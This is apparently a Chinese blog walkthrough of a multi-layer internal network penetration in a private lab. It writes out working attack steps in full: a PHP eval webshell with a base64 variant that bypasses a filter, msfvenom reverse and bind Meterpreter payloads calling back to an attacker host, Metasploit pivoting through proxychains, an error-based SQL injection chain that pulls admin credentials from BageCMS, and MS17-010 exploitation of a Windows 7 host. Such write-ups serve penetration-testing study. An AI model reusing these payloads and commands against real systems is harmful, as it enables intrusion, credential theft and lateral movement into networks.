目录

多层内网渗透
多层内网渗透

access_time
brush 3898个字
local_library 318
local_offer 渗透测试
系统
ip
备注
kali
192.168.15.162
攻击机
centos

192.168.15.161(外)

192.168.22.128(内)

web服务器
ubuntu

192.168.22.129

192.168.33.128

内网web服务器
Windows7
192.168.33.33
内网机器

先用nmap扫描一下,看看目标主机开放了哪些端口

sudo nmap -T4 -O 192.168.15.161

图片.png

可以看到,目标主机开放了8888,3306端口,和888宝塔phpmyadmin默认端口,初步判断是由宝塔搭建的一个php网站


直接访问,发现是一个TP5框架

图片.png

该版本的TP框架有命令执行漏洞,我们直接上exp

图片.png

写入一句话木马

echo "<?php @eval($_POST[‘cmdte’]) ?>" > shell.php

可以看到,$POST被拦了

图片.png

我们对我们的一句话木马进行一下编码

图片.png

echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWR0ZSddKTsgPz4=" | base64 -d >shell.php

成功绕过

图片.png

我们用蚁剑连接

图片.png

看看权限

图片.png

我们用kali生成一个木马弹个shell回来,方便后续的渗透

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.15.162 lport=6666 sessioncommunicationtimeout=0 sessionexpirationtimeout=0 -f elf >shell.elf

图片.png

通过蚁剑上传

图片.png

开启监听

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.15.162
set LPORT 6666 
exploit

图片.png

给权限,执行

图片.png

弹回会话

图片.png

看一下内网网段的地址

run get_local_subnets

图片.png

因为后面的主机是内网的,所以我们要使用代理

先添加一条路由

run autoroute -s 192.168.22.0/24

图片.png

挂起会话

图片.png

我们要使用socks代理,可以搜一下相关模块

图片.png

选择模块

图片.png

因为5版本的socks有时会有问题,所以我们选择4a的版本

图片.png

设置ip

图片.png

我们还要改一下 /etc/proxychains4.conf 这个配置文件,把ip改成kali的ip地址

图片.png

开启代理

图片.png


接下来,我们用nmap扫描内网web服务器开放的端口

proxychains nmap -Pn -sT 192.168.22.129

图片.png

根据开放端口判断,又是个宝塔搭建的php网站

我们在kali里用火狐挂代理访问

proxychains firefox

是一个八哥cms

图片.png

为了方便后续的渗透,我们在windows下使用代理工具

图片.png

通过robots找到后台地址

图片.png

进入后台,尝试弱口令失败

图片.png

寻找注入点,在index.php找到一处注入点,典型的报错注入

图片.png



查库名

http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select database())))--+

图片.png

查用户

http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select user())))--+

图片.png

查表

http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select table_name from information_schema.tables where table_schema='bagecms' limit 1,1)))--+

图片.png

查列名

http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select column_name from information_schema.columns where table_name='bage_admin' limit 0,1)))--+

图片.png

http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select column_name from information_schema.columns where table_name='bage_admin' limit 1,1)))--+

图片.png

http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select column_name from information_schema.columns where table_name='bage_admin' limit 2,1)))--+

图片.png

查数据

http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select concat(username,password) from bage_admin limit 0,1)))--+

图片.png

MD5解密

图片.png

成功进入后台

图片.png

模板插入一句话木马

图片.png

蚁剑连接

图片.png

msf生成木马

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=12345 -f elf >shell2.elf

图片.png

开启监听,蚁剑上传木马执行

proxychains msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.129
set lport 12345
show options
exploit

图片.png

图片.png

成功弹回会话

图片.png

看一下路由

图片.png

添加一条路由

run autoroute -s 192.168.33.0/24
run autoroute -p

图片.png

图片.png

挂起会话

图片.png

扫描内网win7开放了哪些端口

proxychains nmap -Pn -sT 192.168.33.33

445端口开放,初步判定存在ms17_010



使用ms17_010攻击

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.33.33
exploit

图片.png

成功拿下

图片.png

图片.png

#如无特别声明,该文章均为 原创,转载请遵循 署名-非商业性使用 4.0 国际(CC BY-NC 4.0) 协议,即转载请注明文章来源。
#最后编辑时间为: 2023-01-22 12:51:52



create 添加新评论

请先登陆后再发表评论